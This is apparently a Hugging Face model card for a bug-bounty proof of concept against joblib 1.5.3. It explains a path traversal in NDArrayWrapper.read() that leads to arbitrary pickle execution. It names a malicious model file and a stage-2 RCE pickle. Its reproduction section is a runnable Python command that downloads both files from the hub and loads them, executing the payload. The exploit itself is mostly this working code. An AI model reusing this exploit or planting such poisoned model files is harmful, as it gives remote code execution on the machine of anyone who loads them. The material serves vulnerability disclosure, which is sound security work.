joblib NDArrayWrapper Path Traversal PoC

Security research PoC for huntr MFV submission.

Vulnerability: NDArrayWrapper.read() in joblib/numpy_pickle_compat.py uses an unsanitized self.filename field (from inside the pickle) in os.path.join(), then calls numpy.load(filename, allow_pickle=True) โ€” enabling path traversal to arbitrary pickle execution.

Affected version: joblib 1.5.3 (latest)

Files

  • evil.joblib โ€” malicious model file (NDArrayWrapper with filename="../payload.npy")
  • payload.npy โ€” stage-2 RCE pickle (place one directory above evil.joblib)

Reproduction

pip3 install joblib==1.5.3 numpy
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
try: joblib.load('/tmp/poc_model/evil.joblib')
except: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support